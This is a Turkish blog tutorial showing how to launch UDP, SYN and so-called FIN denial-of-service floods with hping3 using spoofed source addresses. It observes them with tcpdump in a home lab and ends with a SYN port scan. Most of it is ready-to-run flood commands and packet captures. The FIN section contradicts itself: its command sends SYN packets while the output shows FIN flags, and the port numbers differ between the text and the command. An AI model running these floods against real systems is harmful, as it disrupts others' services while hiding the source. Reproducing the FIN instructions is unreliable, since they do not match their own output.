Hping3 ile Dos Yapma ve Tcpdump ile İzleme

(+) Bu yazıdaki testler birebir uygulanmıştır ve başarılı olunmuştur.

Not:

Bu yazıda hping3'in yamalı versiyonu kullanılmıştır.

Hping3 normalde paket oluşturma aracıdır. Ancak hping3 tool'unu --flood parametresi ile kullanırsak oluşturduğumuz paketleri olabildiğince hızlı gönder demiş oluruz ve böylece dos saldırısı yapmış oluruz. Şimdi çeşitli paketlerle dos saldırıları düzenleyelim.

a. Hping3 ile UDP Flood Yapma

Laptop'tan desktop PC'ye udp flood saldırısı düzenleyelim. Göndereceğimiz udp paketlerinin source IP'si 193.151.x.x deseninde olsun ve paketlerin gideceği hedef port 53 olsun.

Laptop (Ubuntu):

./hping3 --rand-pattern-source 193.151.x.x --flood --udp -p 53 192.168.68.134 
                                   ^                                ^
                                   |                                |
          Sahte Source IP'ler ======    Hedef Desktop Makinası ======

Çıktı:

HPING 192.168.68.134 (eth0 192.168.68.134): udp mode set, 28 headers + 0 data bytes hping in flood mode, no replies will be shown

Desktop (Ubuntu):

tcpdump -i enp0s25 -tn udp

Çıktı:

IP 193.151.207.65.12483 > 192.168.68.134.53: [|domain]
IP 193.151.158.113.12509 > 192.168.68.134.53: [|domain]
IP 193.151.160.62.12512 > 192.168.68.134.53: [|domain]
IP 193.151.181.212.12513 > 192.168.68.134.53: [|domain]
IP 193.151.99.0.12514 > 192.168.68.134.53: [|domain]
IP 193.151.181.105.12515 > 192.168.68.134.53: [|domain]
IP 193.151.182.103.12542 > 192.168.68.134.53: [|domain]
IP 193.151.4.250.12543 > 192.168.68.134.53: [|domain]
IP 193.151.132.116.12573 > 192.168.68.134.53: [|domain]
IP 193.151.93.11.12574 > 192.168.68.134.53: [|domain]
IP 193.151.178.110.12575 > 192.168.68.134.53: [|domain]
IP 193.151.78.169.12576 > 192.168.68.134.53: [|domain]
IP 193.151.58.251.12579 > 192.168.68.134.53: [|domain]
IP 193.151.97.17.12605 > 192.168.68.134.53: [|domain]
IP 193.151.19.82.12606 > 192.168.68.134.53: [|domain]
IP 193.151.4.41.12607 > 192.168.68.134.53: [|domain]
IP 193.151.165.2.12608 > 192.168.68.134.53: [|domain]
IP 193.151.29.7.12637 > 192.168.68.134.53: [|domain]
IP 193.151.70.89.12638 > 192.168.68.134.53: [|domain]
IP 193.151.106.165.12667 > 192.168.68.134.53: [|domain]
IP 193.151.148.113.12668 > 192.168.68.134.53: [|domain]
IP 193.151.93.2.12680 > 192.168.68.134.53: [|domain]
IP 193.151.76.65.12681 > 192.168.68.134.53: [|domain]
IP 193.151.68.26.12682 > 192.168.68.134.53: [|domain]
IP 193.151.55.186.12683 > 192.168.68.134.53: [|domain]
IP 193.151.76.96.12684 > 192.168.68.134.53: [|domain]
IP 193.151.162.194.12685 > 192.168.68.134.53: [|domain]
IP 193.151.106.27.12686 > 192.168.68.134.53: [|domain]
IP 193.151.221.19.12701 > 192.168.68.134.53: [|domain]
IP 193.151.215.193.12720 > 192.168.68.134.53: [|domain]
IP 193.151.35.251.12721 > 192.168.68.134.53: [|domain]
IP 193.151.176.198.12722 > 192.168.68.134.53: [|domain]
IP 193.151.105.55.12730 > 192.168.68.134.53: [|domain]
IP 193.151.165.115.12777 > 192.168.68.134.53: [|domain]
IP 193.151.26.56.12778 > 192.168.68.134.53: [|domain]
IP 193.151.214.23.12779 > 192.168.68.134.53: [|domain]
IP 193.151.92.12.12780 > 192.168.68.134.53: [|domain]
IP 193.151.176.87.12810 > 192.168.68.134.53: [|domain]
IP 193.151.197.132.12811 > 192.168.68.134.53: [|domain]
IP 193.151.181.123.12826 > 192.168.68.134.53: [|domain]
IP 193.151.82.128.12836 > 192.168.68.134.53: [|domain]
IP 193.151.223.28.12837 > 192.168.68.134.53: [|domain]

Masaüstü pc'de tcpdump komutu girildikten sonra sisteme gelen normal udp paketleri ekrana gelirken hping3 tool'u çalıştırıldığında bir anda ekranı hızla 193.151.xx deseninde ip'lerden gelen udp paketleri doldurmuştur. Çıktıdan da görülebileceği üzere kaynak IP'si 193.151.x.x deseninde olan paketler 53ncü portumuza gelmiştirler.

b. Hping3 ile Syn Flood Yapma

Laptop'tan masaüstü PC'ye syn flood saldırısı düzenleyelim. Göndereceğimiz syn paketlerinin source IP'si 193.151.x.x deseninde olsun ve paketlerin gideceği hedef port 55 olsun.

Laptop (Ubuntu):

./hping3 --flood --syn -p 55 192.168.68.134 --rand-pattern-source 193.151.x.x

Desktop (Ubuntu):

tcpdump -i enp0s25 -tn 'tcp[13] & tcp-syn != 0'

Çıktı:

IP 193.151.41.199.22053 > 192.168.68.134.55: Flags [S], seq 2062188485, win 512, length 0
IP 193.151.161.195.22059 > 192.168.68.134.55: Flags [S], seq 869466075, win 512, length 0
IP 193.151.146.228.22060 > 192.168.68.134.55: Flags [S], seq 1825063176, win 512, length 0
IP 193.151.69.5.22061 > 192.168.68.134.55: Flags [S], seq 1777850188, win 512, length 0
IP 193.151.209.16.22062 > 192.168.68.134.55: Flags [S], seq 145844699, win 512, length 0
IP 193.151.66.88.22063 > 192.168.68.134.55: Flags [S], seq 1641004086, win 512, length 0
IP 193.151.16.163.22069 > 192.168.68.134.55: Flags [S], seq 390504677, win 512, length 0
IP 193.151.9.164.22080 > 192.168.68.134.55: Flags [S], seq 1008040547, win 512, length 0
IP 193.151.197.207.22094 > 192.168.68.134.55: Flags [S], seq 728327576, win 512, length 0
IP 193.151.242.80.22123 > 192.168.68.134.55: Flags [S], seq 153918576, win 512, length 0
IP 193.151.190.72.22138 > 192.168.68.134.55: Flags [S], seq 1312716596, win 512, length 0
IP 193.151.15.56.22139 > 192.168.68.134.55: Flags [S], seq 1414419537, win 512, length 0
IP 193.151.119.53.22146 > 192.168.68.134.55: Flags [S], seq 2092261174, win 512, length 0
IP 193.151.120.46.22176 > 192.168.68.134.55: Flags [S], seq 1359051656, win 512, length 0
IP 193.151.68.64.22184 > 192.168.68.134.55: Flags [S], seq 475056854, win 512, length 0
IP 193.151.200.226.22185 > 192.168.68.134.55: Flags [S], seq 264540782, win 512, length 0
IP 193.151.196.218.22186 > 192.168.68.134.55: Flags [S], seq 493670053, win 512, length 0
IP 193.151.175.228.22194 > 192.168.68.134.55: Flags [S], seq 1578873503, win 512, length 0
IP 193.151.249.249.22203 > 192.168.68.134.55: Flags [S], seq 1442570489, win 512, length 0
IP 193.151.249.69.22204 > 192.168.68.134.55: Flags [S], seq 911189610, win 512, length 0
IP 193.151.228.17.22205 > 192.168.68.134.55: Flags [S], seq 242218285, win 512, length 0
IP 193.151.173.187.22206 > 192.168.68.134.55: Flags [S], seq 1842196420, win 512, length 0
IP 193.151.83.49.22217 > 192.168.68.134.55: Flags [S], seq 349717068, win 512, length 0
IP 193.151.128.139.22226 > 192.168.68.134.55: Flags [S], seq 549209499, win 512, length 0
IP 193.151.43.200.22228 > 192.168.68.134.55: Flags [S], seq 927399876, win 512, length 0
IP 193.151.41.226.22231 > 192.168.68.134.55: Flags [S], seq 2042946276, win 512, length 0
IP 193.151.127.114.22237 > 192.168.68.134.55: Flags [S], seq 1501583623, win 512, length 0
IP 193.151.174.17.22238 > 192.168.68.134.55: Flags [S], seq 33630617, win 512, length 0
IP 193.151.49.95.22262 > 192.168.68.134.55: Flags [S], seq 1371362904, win 512, length 0
IP 193.151.192.206.22296 > 192.168.68.134.55: Flags [S], seq 1218945438, win 512, length 0
IP 193.151.77.224.22308 > 192.168.68.134.55: Flags [S], seq 1832117766, win 512, length 0
IP 193.151.194.74.22314 > 192.168.68.134.55: Flags [S], seq 815486769, win 512, length 0
IP 193.151.64.89.22325 > 192.168.68.134.55: Flags [S], seq 274879436, win 512, length 0
IP 193.151.233.120.22341 > 192.168.68.134.55: Flags [S], seq 1488008803, win 512, length 0
IP 193.151.29.44.22357 > 192.168.68.134.55: Flags [S], seq 1052529189, win 512, length 0
IP 193.151.94.228.22359 > 192.168.68.134.55: Flags [S], seq 876995605, win 512, length 0
IP 193.151.241.235.22371 > 192.168.68.134.55: Flags [S], seq 1274538751, win 512, length 0
IP 193.151.43.53.22397 > 192.168.68.134.55: Flags [S], seq 55539032, win 512, length 0
IP 193.151.170.53.22401 > 192.168.68.134.55: Flags [S], seq 1596231800, win 512, length 0
IP 193.151.27.66.22403 > 192.168.68.134.55: Flags [S], seq 2000793456, win 512, length 0

Görüldüğü üzere kaynak IP'si 193.151.xx deseninde olan Syn paketleri 55nci portumuza gelmiştir.

c. Hping3 ile Fin Flood Yapma

Laptop'tan masaüstü PC'ye syn flood saldırısı düzenleyelim. Göndereceğimiz syn paketlerinin source IP'si 193.151.x.x deseninde olsun ve paketlerin gideceği hedef port 73 olsun.

Laptop (Ubuntu):

./hping3 --rand-pattern-source 193.151.x.x --flood --syn -p 71 192.168.68.134

Desktop (Ubuntu):

tcpdump -i enp0s25 -tn 'tcp[13] & tcp-fin != 0'

Çıktı:

IP 193.151.97.49.53775 > 192.168.68.134.71: Flags [F], seq 1544309775, win 512, length 0
IP 193.151.165.52.53803 > 192.168.68.134.71: Flags [F], seq 1268878081, win 512, length 0
IP 193.151.137.21.53804 > 192.168.68.134.71: Flags [F], seq 1503604814, win 512, length 0
IP 193.151.117.99.53805 > 192.168.68.134.71: Flags [F], seq 1776124646, win 512, length 0
IP 193.151.236.174.53829 > 192.168.68.134.71: Flags [F], seq 1275686603, win 512, length 0
IP 193.151.252.54.53830 > 192.168.68.134.71: Flags [F], seq 675262762, win 512, length 0
IP 193.151.83.145.53858 > 192.168.68.134.71: Flags [F], seq 2114381334, win 512, length 0
IP 193.151.143.85.53859 > 192.168.68.134.71: Flags [F], seq 1842356330, win 512, length 0
IP 193.151.108.182.53882 > 192.168.68.134.71: Flags [F], seq 957295379, win 512, length 0
IP 193.151.114.143.53883 > 192.168.68.134.71: Flags [F], seq 641899809, win 512, length 0
IP 193.151.158.172.53908 > 192.168.68.134.71: Flags [F], seq 477903290, win 512, length 0
IP 193.151.11.40.53909 > 192.168.68.134.71: Flags [F], seq 1456611119, win 512, length 0
IP 193.151.11.190.53910 > 192.168.68.134.71: Flags [F], seq 304991553, win 512, length 0
IP 193.151.193.244.53911 > 192.168.68.134.71: Flags [F], seq 468241012, win 512, length 0
IP 193.151.171.237.53912 > 192.168.68.134.71: Flags [F], seq 1580565956, win 512, length 0
IP 193.151.203.1.53938 > 192.168.68.134.71: Flags [F], seq 500526253, win 512, length 0
IP 193.151.76.234.53939 > 192.168.68.134.71: Flags [F], seq 1977037155, win 512, length 0
IP 193.151.183.227.53961 > 192.168.68.134.71: Flags [F], seq 194609602, win 512, length 0
IP 193.151.108.193.53962 > 192.168.68.134.71: Flags [F], seq 432981958, win 512, length 0
IP 193.151.249.242.53963 > 192.168.68.134.71: Flags [F], seq 215932346, win 512, length 0
IP 193.151.97.13.53964 > 192.168.68.134.71: Flags [F], seq 1577291126, win 512, length 0
IP 193.151.80.235.53992 > 192.168.68.134.71: Flags [F], seq 1309601551, win 512, length 0
IP 193.151.164.40.53993 > 192.168.68.134.71: Flags [F], seq 652941122, win 512, length 0
IP 193.151.245.237.54016 > 192.168.68.134.71: Flags [F], seq 152622224, win 512, length 0
IP 193.151.87.4.54017 > 192.168.68.134.71: Flags [F], seq 1652241550, win 512, length 0
IP 193.151.19.180.54018 > 192.168.68.134.71: Flags [F], seq 1570782794, win 512, length 0
IP 193.151.40.68.54045 > 192.168.68.134.71: Flags [F], seq 1809580777, win 512, length 0
IP 193.151.174.40.54071 > 192.168.68.134.71: Flags [F], seq 175188272, win 512, length 0
IP 193.151.56.98.54072 > 192.168.68.134.71: Flags [F], seq 945504080, win 512, length 0
IP 193.151.170.85.54099 > 192.168.68.134.71: Flags [F], seq 776748326, win 512, length 0
IP 193.151.112.142.54123 > 192.168.68.134.71: Flags [F], seq 1763772226, win 512, length 0
IP 193.151.106.65.54124 > 192.168.68.134.71: Flags [F], seq 268568409, win 512, length 0
IP 193.151.181.205.54125 > 192.168.68.134.71: Flags [F], seq 1870202114, win 512, length 0
IP 193.151.159.21.54153 > 192.168.68.134.71: Flags [F], seq 2068282370, win 512, length 0

Görüldüğü üzere kaynak IP'si 193.151.xx deseninde olan Fin paketleri 55nci portumuza gelmiştir.

Bu şekilde hping3 tool'unun oluşturabildiği her paketle dos saldırısı düzenleyebiliriz.

Ekstra [Hping3 ile Port Taraması Yapma]

Laptop (Ubuntu):

./hping3 -S 192.168.68.134 -p ++20
                              ^
                              |
                              =========  Port 20'den itibaren artıra
                                         artıra tüm portları tara

Desktop (Ubuntu):

tcpdump -i enp0s25 -tn 'tcp[13] & tcp-syn != 0'

Çıktı:

IP 192.168.68.113.1222 > 192.168.68.134.20: Flags [S], seq 1036518285, win 512, length 0
IP 192.168.68.113.1223 > 192.168.68.134.21: Flags [S], seq 2118026086, win 512, length 0
IP 192.168.68.113.1224 > 192.168.68.134.22: Flags [S], seq 725999915, win 512, length 0
IP 192.168.68.113.1225 > 192.168.68.134.23: Flags [S], seq 2131961761, win 512, length 0
IP 192.168.68.113.1226 > 192.168.68.134.24: Flags [S], seq 1553262406, win 512, length 0
IP 192.168.68.113.1227 > 192.168.68.134.25: Flags [S], seq 1279084552, win 512, length 0
IP 192.168.68.113.1228 > 192.168.68.134.26: Flags [S], seq 1815687970, win 512, length 0
IP 192.168.68.113.1229 > 192.168.68.134.27: Flags [S], seq 771876914, win 512, length 0
IP 192.168.68.113.1230 > 192.168.68.134.28: Flags [S], seq 1519793928, win 512, length 0
IP 192.168.68.113.1231 > 192.168.68.134.29: Flags [S], seq 319148551, win 512, length 0
IP 192.168.68.113.1232 > 192.168.68.134.30: Flags [S], seq 350166750, win 512, length 0
IP 192.168.68.113.1233 > 192.168.68.134.31: Flags [S], seq 296332765, win 512, length 0
IP 192.168.68.113.1234 > 192.168.68.134.32: Flags [S], seq 1956037143, win 512, length 0
IP 192.168.68.113.1235 > 192.168.68.134.33: Flags [S], seq 2140988260, win 512, length 0
IP 192.168.68.113.1236 > 192.168.68.134.34: Flags [S], seq 1480751483, win 512, length 0
IP 192.168.68.113.1237 > 192.168.68.134.35: Flags [S], seq 1681103578, win 512, length 0
IP 192.168.68.113.1238 > 192.168.68.134.36: Flags [S], seq 510842195, win 512, length 0
IP 192.168.68.113.1239 > 192.168.68.134.37: Flags [S], seq 1334188951, win 512, length 0
IP 192.168.68.113.1240 > 192.168.68.134.38: Flags [S], seq 1440972696, win 512, length 0
IP 192.168.68.113.1241 > 192.168.68.134.39: Flags [S], seq 238985485, win 512, length 0
IP 192.168.68.113.1242 > 192.168.68.134.40: Flags [S], seq 1468508307, win 512, length 0
IP 192.168.68.113.1243 > 192.168.68.134.41: Flags [S], seq 944536532, win 512, length 0
IP 192.168.68.113.1244 > 192.168.68.134.42: Flags [S], seq 1993490788, win 512, length 0
IP 192.168.68.113.1245 > 192.168.68.134.43: Flags [S], seq 1435072113, win 512, length 0
IP 192.168.68.113.1246 > 192.168.68.134.44: Flags [S], seq 1161463182, win 512, length 0
IP 192.168.68.113.1247 > 192.168.68.134.45: Flags [S], seq 1792398572, win 512, length 0
IP 192.168.68.113.1248 > 192.168.68.134.46: Flags [S], seq 1326909211, win 512, length 0
IP 192.168.68.113.1249 > 192.168.68.134.47: Flags [S], seq 856154278, win 512, length 0
IP 192.168.68.113.1250 > 192.168.68.134.48: Flags [S], seq 1314405433, win 512, length 0
IP 192.168.68.113.1251 > 192.168.68.134.49: Flags [S], seq 1408343378, win 512, length 0
IP 192.168.68.113.1252 > 192.168.68.134.50: Flags [S], seq 247760419, win 512, length 0
IP 192.168.68.113.1253 > 192.168.68.134.51: Flags [S], seq 1016658489, win 512, length 0
IP 192.168.68.113.1254 > 192.168.68.134.52: Flags [S], seq 1538096378, win 512, length 0
IP 192.168.68.113.1255 > 192.168.68.134.53: Flags [S], seq 390590354, win 512, length 0
IP 192.168.68.113.1256 > 192.168.68.134.54: Flags [S], seq 1853585825, win 512, length 0
IP 192.168.68.113.1257 > 192.168.68.134.55: Flags [S], seq 1037894254, win 512, length 0
IP 192.168.68.113.1258 > 192.168.68.134.56: Flags [S], seq 1370083841, win 512, length 0
IP 192.168.68.113.1259 > 192.168.68.134.57: Flags [S], seq 370875260, win 512, length 0
IP 192.168.68.113.1260 > 192.168.68.134.58: Flags [S], seq 959629073, win 512, length 0
IP 192.168.68.113.1261 > 192.168.68.134.59: Flags [S], seq 361171913, win 512, length 0
IP 192.168.68.113.1262 > 192.168.68.134.60: Flags [S], seq 1042135979, win 512, length 0
IP 192.168.68.113.1263 > 192.168.68.134.61: Flags [S], seq 1205204373, win 512, length 0
IP 192.168.68.113.1264 > 192.168.68.134.62: Flags [S], seq 1146709860, win 512, length 0
IP 192.168.68.113.1265 > 192.168.68.134.63: Flags [S], seq 675205935, win 512, length 0
IP 192.168.68.113.1266 > 192.168.68.134.64: Flags [S], seq 1931680859, win 512, length 0
IP 192.168.68.113.1267 > 192.168.68.134.65: Flags [S], seq 2101918818, win 512, length 0
IP 192.168.68.113.1268 > 192.168.68.134.66: Flags [S], seq 719539742, win 512, length 0
IP 192.168.68.113.1269 > 192.168.68.134.67: Flags [S], seq 442869475, win 512, length 0
IP 192.168.68.113.1270 > 192.168.68.134.68: Flags [S], seq 458613320, win 512, length 0
IP 192.168.68.113.1271 > 192.168.68.134.69: Flags [S], seq 60260326, win 512, length 0
IP 192.168.68.113.1272 > 192.168.68.134.70: Flags [S], seq 1634279625, win 512, length 0
IP 192.168.68.113.1273 > 192.168.68.134.71: Flags [S], seq 206728582, win 512, length 0
IP 192.168.68.113.1274 > 192.168.68.134.72: Flags [S], seq 1017111024, win 512, length 0
IP 192.168.68.113.1275 > 192.168.68.134.73: Flags [S], seq 1763950444, win 512, length 0

...

Not:

Çıktıya dikkatli bakıldığında port numaralarının 20 den itibaren sırayla arttığı görülebilir.

Görüldüğü üzere hedef makinanın port 20'sinden başlanarak artıra artıra tüm portlarına Syn paketi gönderilmiştir.
Bu yazı 17.06.2025 tarihinde, saat 16:22:30'de yazılmıştır.
Yazar : Hasan Fatih ŞİMŞEK Görüntülenme Sayısı : 23
Yorumlar
Henüz yorum girilmemiştir.
Yorum Ekle
*
* (E-posta adresiniz yayınlanmayacaktır.)
*
*

#Arşiv


#Giriş

ID :
Şifre :